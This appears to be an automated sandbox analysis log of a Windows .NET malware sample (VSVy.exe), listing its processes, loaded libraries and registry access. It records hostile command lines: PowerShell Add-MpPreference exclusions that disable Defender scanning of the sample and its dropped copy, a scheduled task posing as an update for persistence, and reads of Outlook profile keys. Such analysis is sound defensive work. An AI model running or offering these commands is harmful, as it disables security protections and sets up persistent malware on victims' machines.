              Source: C:\Users\user\Desktop\VSVy.exeFile created: C:\Users\user\AppData\Local\Temp\tmp337E.tmpJump to behavior
              Source: VSVy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: VSVy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\VSVy.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: VSVy.exeReversingLabs: Detection: 32%
              Source: VSVy.exeVirustotal: Detection: 36%
              Source: C:\Users\user\Desktop\VSVy.exeFile read: C:\Users\user\Desktop\VSVy.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\VSVy.exe "C:\Users\user\Desktop\VSVy.exe"
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJfOOh.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Users\user\Desktop\VSVy.exe "C:\Users\user\Desktop\VSVy.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\gJfOOh.exe C:\Users\user\AppData\Roaming\gJfOOh.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess created: C:\Users\user\AppData\Roaming\gJfOOh.exe "C:\Users\user\AppData\Roaming\gJfOOh.exe"
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess created: C:\Users\user\AppData\Roaming\gJfOOh.exe "C:\Users\user\AppData\Roaming\gJfOOh.exe"
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe"Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJfOOh.exe"Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Users\user\Desktop\VSVy.exe "C:\Users\user\Desktop\VSVy.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess created: C:\Users\user\AppData\Roaming\gJfOOh.exe "C:\Users\user\AppData\Roaming\gJfOOh.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess created: C:\Users\user\AppData\Roaming\gJfOOh.exe "C:\Users\user\AppData\Roaming\gJfOOh.exe"Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: rasapi32.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: rasman.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: rtutils.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: secur32.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: schannel.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: mskeyprotect.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: ntasn1.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: ncrypt.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: ncryptsslp.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeSection loaded: dpapi.dll
              Source: C:\Users\user\Desktop\VSVy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\VSVy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: VSVy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: VSVy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
